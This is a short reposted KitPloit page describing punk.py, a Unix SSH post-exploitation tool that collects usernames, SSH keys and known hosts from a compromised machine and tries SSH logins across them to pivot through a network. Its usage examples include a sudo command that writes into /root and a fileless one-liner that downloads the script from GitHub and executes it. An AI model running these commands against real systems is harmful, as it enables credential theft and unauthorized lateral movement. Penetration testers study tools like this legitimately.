Punk.Py - Unix SSH Post-Exploitation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
2018-12-17 23:56:58 Author: www.kitploit.com(查看原文) 阅读量:292 收藏

unix SSH post-exploitation 1337 tool

how it works
punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on standard python2 and python3 installations.

examples
standard execution:

 ~$ ./punk.py

skip passwd checks and use a custom home path:

 ~$ ./punk.py --no-passwd --home /home/ldapusers/

execute commands with sudo:

 ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

one-liner fileless ( with --no-passwd parameter ):

 ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

TODO

Punk.Py - Unix SSH Post-Exploitation Tool Punk.Py - Unix SSH Post-Exploitation  Tool Reviewed by Lydecker Black on 6:28 PM Rating: 5


文章来源: https://www.kitploit.com/2018/12/punkpy-unix-ssh-post-exploitation-tool.html?utm_source=dlvr.it&utm_medium=twitter
如有侵权请联系:admin#unsafe.sh